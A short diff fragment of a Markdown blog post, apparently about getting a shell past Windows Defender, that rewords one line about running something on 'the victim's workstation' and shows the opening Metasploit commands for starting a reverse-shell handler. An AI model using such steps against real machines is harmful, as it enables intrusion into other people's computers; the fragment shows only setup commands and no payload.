Ruuucker/Ruuucker.github.io/_posts/articles/2019-07-14-Shell through-Windows-Defender.md

 ~~~

-And run it on the victim's workstation preliminarily run handler:<br>
+And run it on the victim's workstation preliminarily launch handler:<br>
 ~~~
 msfconsole
 use exploit/multi/handler